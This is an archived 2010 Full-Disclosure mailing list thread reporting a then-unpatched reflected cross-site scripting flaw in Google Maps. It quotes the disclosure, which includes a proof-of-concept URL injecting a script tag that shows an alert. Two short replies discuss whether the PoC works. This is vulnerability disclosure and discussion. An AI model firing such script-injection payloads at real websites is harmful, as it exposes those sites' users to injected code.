full-disclosure-uk January 2010 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: Re: [Full-disclosure] Google Maps XSS (curre

Re: [Full-disclosure] Google Maps XSS (currently unpatched)

From: Christian Sciberras <uuf6429_at_nospam>
Date: Tue Jan 12 2010 - 13:02:16 GMT
To: Michael Lenz <shadow.stalker@gmx.de>


I tried the PoC and it works as advertised, however due to the amount of requests to the same url, I suppose Google noticed something fishy...

Regards,
Chris.

On Tue, Jan 12, 2010 at 1:58 PM, Michael Lenz <shadow.stalker@gmx.de> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Your PoC generates:
>
> "
> *Google*
> Sorry...
>
>
> We're sorry...
>
> ... but your computer or network may be sending automated queries. To
> protect our users, we can't process your request right now.
>
> See Google Help
> <http://www.google.com/support/bin/answer.py?answer=86640> for more
> information.
>
> 2009 Google - Google Home <http://www.google.com>"
>
>
> So..?
>
> gaurav baruah schrieb:
>> Google Maps XSS (currently unpatched)
>>
>> Discovered By -
>> Pratul Agrawal (pratul2u@gmail.com)
>> Gaurav Baruah (baruah.gaurav@gmail.com)
>>
>>
>> PoC -
> http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=%3Cscript%3Ealert(%22Google%20Sucks%20!%22)%3C/script%3E&vps=1&sll=28.613554,77.20906&sspn=0.009136,0.013797&ie=UTF8
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> gaurav baruah schrieb:
>> Google Maps XSS (currently unpatched)
>>
>> Discovered By -
>> Pratul Agrawal (pratul2u@gmail.com)
>> Gaurav Baruah (baruah.gaurav@gmail.com)
>>
>>
>> PoC -
> http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=%3Cscript%3Ealert(%22Google%20Sucks%20!%22)%3C/script%3E&vps=1&sll=28.613554,77.20906&sspn=0.009136,0.013797&ie=UTF8
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.9 (GNU/Linux)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
>
> iEYEARECAAYFAktMcfAACgkQ12k6J+72BxijGwCgvA7qEWtv8D9ImB9vGc8FBkZf
> xOUAnjUQ3dhG6bGwg690pqDXLyzeDQYC
> =GYKt
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/